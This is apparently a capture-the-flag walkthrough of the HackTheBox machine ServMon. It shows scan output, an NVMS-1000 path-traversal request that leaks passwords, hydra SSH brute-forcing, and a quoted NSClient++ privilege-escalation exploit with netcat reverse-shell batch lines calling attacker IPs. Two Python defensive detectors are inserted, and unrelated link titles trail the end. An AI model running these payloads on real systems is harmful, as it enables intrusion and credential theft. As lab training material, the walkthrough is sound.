Scan the host's open ports

sudo nmap -sC -sV -sS 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 02:32 EDT
Nmap scan report for 10.10.10.184
Host is up (0.35s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open     ssh            OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open     http
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
5666/tcp  open     tcpwrapped
6699/tcp  open     napster?
8443/tcp  open     ssl/https-alt
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|     jobs
|   HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|_    Document not found
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
32772/tcp filtered sometimes-rpc7
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m46s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-18T06:39:45
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.07 seconds

The scan above shows that the FTP service allows anonymous login, so we try logging in.

Retrieve the files from FTP

kali@kali:~$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
174 bytes received in 0.28 secs (0.6031 kB/s)
ftp> cd ../
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
186 bytes received in 0.33 secs (0.5584 kB/s)

Look at the contents of Confidential.txt and Notes to do.txt
Confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
Nadine

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Visit port 80

We try logging in with admin:admin, which fails; Nadine:Nathan does not work either.

The login page belongs to a web panel (NVMS 1000), so on Kali we search for it with searchsploit.

searchsploit NVMS 1000


Reading the exploit notes for this software, we can see that it is a file inclusion (path traversal) vulnerability.

cat /usr/share/exploitdb/exploits/hardware/webapps/47774.txt


Use Burp Suite to intercept the request and exploit it

Confidential.txt contains the line: I left your Passwords.txt file on your Desktop.
So we try to include the Passwords.txt file from that Desktop and obtain a list of passwords.

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=undefinde
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
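As an added defensive example (not part of the original writeup), the following Python scanner decodes and normalises request paths the way a file-serving web server should, and flags any request that climbs above the web root, like the NVMS-1000 request above. The request lines are constructed; only the second one mirrors the shape of the request in the writeup.

```python
import posixpath
from urllib.parse import unquote

# Constructed request lines (not captured from the page's target). The second
# one mirrors the shape of the NVMS-1000 traversal request shown above.
SAMPLE_REQUESTS = [
    "GET /Pages/login.htm HTTP/1.1",
    "GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1",
    "GET /images/..%2f..%2f..%2fWindows%2fwin.ini HTTP/1.1",
    "GET /static/..\\..\\..\\Users\\Nathan\\Desktop\\Passwords.txt HTTP/1.1",
    "GET /docs/../Pages/login.htm HTTP/1.1",
]

def decode_path(raw):
    """Percent-decode twice (catches %252e double encoding) and treat
    backslashes as separators, as a Windows file server would."""
    return unquote(unquote(raw)).replace("\\", "/")

def escapes_root(raw):
    """True if the request climbs above the web root: walk the decoded
    segments and check whether '..' ever takes the depth below zero.
    A '..' that stays inside the root (e.g. /docs/../Pages) is legitimate."""
    depth = 0
    for seg in decode_path(raw).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def resolved_target(raw):
    """Where the request lands once '..' has been collapsed, taken relative
    to the drive root (posixpath.normpath clamps at '/')."""
    return posixpath.normpath("/" + decode_path(raw).lstrip("/"))

def scan(request_lines):
    """Return [(method, raw path, resolved target)] for root-escaping requests."""
    hits = []
    for line in request_lines:
        parts = line.split()
        if len(parts) >= 2 and escapes_root(parts[1]):
            hits.append((parts[0], parts[1], resolved_target(parts[1])))
    return hits
```

Feeding real access-log request lines into scan() gives a quick triage list of traversal attempts and the file each one would have reached on an unpatched server.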

Create a username wordlist and a password wordlist

Use hydra to brute-force the SSH accounts

hydra -L users.txt -P passwords.txt 10.10.10.184 ssh


We obtain a valid account and password

host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk

Log in over SSH

Check the user's privileges

Looking back at the Nmap results, port 8443 also runs a web service.

It turns out to be NSClient++; we search with searchsploit to see whether there is anything exploitable.

Look at the exploit

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local Syste

First we get the NSClient++ password

type nsclient.ini
Password: ew2x6SsGTxjRwXOT


However, only 127.0.0.1 is allowed to connect, so we forward the port over SSH

ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184

Visit https://127.0.0.1:9000
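As an added defensive example (not from the original writeup or the NSClient++ project), this Python audit reads an nsclient.ini and reports the conditions the advisory above chains together: web server on, cleartext admin password, CheckExternalScripts plus Scheduler enabled, and an allowed-hosts restriction that a local user sidesteps with exactly the SSH port forward shown above. The ini fragment is constructed, and the section and key names are assumed to match NSClient++'s layout; verify them against your own installation.

```python
import configparser

# Constructed nsclient.ini fragment (not the page's file) laid out like the one
# the writeup describes. Section and key names are assumed to match NSClient++'s
# own layout; check them against your installed nsclient.ini.
SAMPLE_INI = """\
[/modules]
; Undocumented key
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/default]
; Undocumented key
password = CONSTRUCTED_PLACEHOLDER
allowed hosts = 127.0.0.1
"""

def audit_nsclient_ini(text):
    """Return a list of findings for the conditions the advisory chains
    together; an empty list means the web-based escalation path is closed."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # keep key case so 'CheckExternalScripts' matches
    cp.read_string(text)
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    defaults = cp["/settings/default"] if cp.has_section("/settings/default") else {}

    def enabled(name):
        return modules.get(name, "").strip().lower() == "enabled"

    findings = []
    if not enabled("WEBServer"):
        return findings  # no web interface, so no remote configuration changes
    findings.append("WEBServer module enabled")
    if defaults.get("password", "").strip():
        findings.append("web admin password stored in cleartext; restrict the "
                        "file's ACL so unprivileged local users cannot read it")
    if enabled("CheckExternalScripts") and enabled("Scheduler"):
        findings.append("CheckExternalScripts and Scheduler both enabled: a web "
                        "admin can schedule a script that runs as Local System")
    hosts = defaults.get("allowed hosts", "").strip()
    if not hosts:
        findings.append("allowed hosts empty: web interface reachable from anywhere")
    elif hosts in ("127.0.0.1", "localhost", "::1"):
        findings.append("allowed hosts is loopback only, which a local user "
                        "bypasses with an SSH port forward to 127.0.0.1:8443")
    return findings
```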

We continue with steps 2, 3 and 4 from the exploit above, uploading nc and evilshell.bat.
Contents of evilshell.bat:

@echo off
C:\Temp\nc.exe 10.10.14.52 4444 -e cmd.exe

10.10.14.52 is the IP address of our attacking machine.
Back in the web interface, add a new script under Settings > Scripts:

key = foobar
value = c:\temp\evilshell.bat


Add a schedule for the script under Settings > Scheduler > Schedules

On Kali, start an nc listener on the port used in evilshell.bat

nc -lvp 4444

Click Control in the menu bar and wait about a minute; a shell comes back to the listener.
Checking our privileges shows that we are SYSTEM.

NowSec

HTB之ServMon相关推荐

  1. 手机流量共享 linux,linux – 通过HTB共享带宽和优先处理实时流量,哪种方案更好?...

    我想在我们的互联网线路上添加一些流量管理.在阅读了大量文档之后,我认为HFSC对我来说太复杂了(我不了解所有曲线的东西,我担心我永远不会把它弄好),CBQ不推荐,基本上HTB就是通往适合大多数人. 我 ...

  2. linux htb 源代码,LINUX TC:HTB相关源码

    LINUX TC:HTB相关源码 收藏 HTB(hierarchy token buffer)是linux tc(traffic control)模块中的排队队列的一种.它的配置比CBQ要简单.同时实 ...

  3. Linux 工具 | 第1篇:高级流控-TC+HTB+IFB+内核模块

    作者:isshe 日期:2018.09.19 邮箱:i.sshe@outlook.com github: https://github.com/isshe 高级流控-TC+HTB+IFB+内核模块 1 ...

  4. linux下TC+HTB流量控制

    C规则涉及到 队列(QUEUE) 分类器(CLASS) 过滤器(FILTER),filter划分的标志位可用U32或iptables的set-mark来实现 ) 一般是"控发"不控 ...

  5. HTB打靶(Active Directory 101 Mantis)

    namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...

  6. Linux TC 流量控制与排队规则 qdisc 树型结构详解(以HTB和RED为例)

    1. 背景 Linux 操作系统中的流量控制器 TC (Traffic Control) 用于Linux内核的流量控制,它规定建立处理数据包的队列,并定义队列中的数据包被发送的方式,从而实现对流量的控 ...

  7. 漏洞payload 靶机_【HTB系列】靶机Bitlab的渗透测试

    本文作者:是大方子(Ms08067实验室核心成员) ﹀ ﹀ ﹀ 0x00 本文目录 反思与总结 基本信息 渗透测试过程 补充 0x01 反思与总结 1. curl 发送GET参数化请求 2. 对反弹回 ...

  8. HTB打靶(Active Directory 101 Reel)

    nmap扫描目标 nmap -A -T4 10.10.10.77 Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST Nma ...

  9. HTB靶场系列 Windows靶机 Granny靶机

    勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 C ...

最新文章

  1. 聊一聊Java字符串的不可变
  2. 电池pack结构_PACK仿真电池分析新能源汽车整车碰撞
  3. if var matlab,matlab中if 语句后面的判别式不能是算术表达式?或者说变量?
  4. 中国自主可免费使用的一站式 IoT 集成开发环境 RT-Thread Studio 发布!
  5. 带有控制器,方法,标题,参数,@ RequestParam,@ PathVariable的Spring MVC @RequestMapping注释示例
  6. 从0.5到1写个rpc框架 - 2:远程服务调用(grpc)
  7. 阿里云容器服务Kubernetes之Jenkins X(2)-自动化CICD实践篇
  8. C语言优先级顺序表口诀
  9. mac 设置网页字体
  10. 2022年前端面试题整理,持续更新中
  11. html中的注释格式是,html的注释格式是什么
  12. 零基础C语言入门001——编译器下载
  13. .text‘ will not fit in region `ROM‘, region `ROM‘ overflowed by 3056 bytes问题记录
  14. 让步进电机动起来——L298N驱动步进电机
  15. 三菱FX3U与4台三菱变频器专用指令通讯案例
  16. webapi500错误
  17. 根据起始点经纬度、方向、距离,计算目标点经纬度
  18. C语言格式输入函数scanf()详解
  19. [转]适应多种智能电表通信规约的无线抄表解决方案
  20. android2010有什么手机,2010年7款最佳Android手机

热门文章

  1. 计算机二级考试系统变化须知~
  2. 《摔跤吧!爸爸》——一个伟大的父亲与两位坚毅的女儿
  3. 硬盘使用时间可以改吗? 如何修改呢
  4. FT4232H数据手册_USB转4路UART芯片
  5. linux怎么还原bak文件,Linux系统restore命令:还原dump操作备份下的文件、目录或分区...
  6. 前沿|算法:人工智能的新曙光
  7. Mac 升级新系统导致VMvare Fusion启动黑屏
  8. 信息技术计算机的飞速发展,21世纪是一个信息技术飞速发展和计算机广泛应用.doc...
  9. 【Vue】父子组件通信
  10. 运营数据分析模型—漏斗分析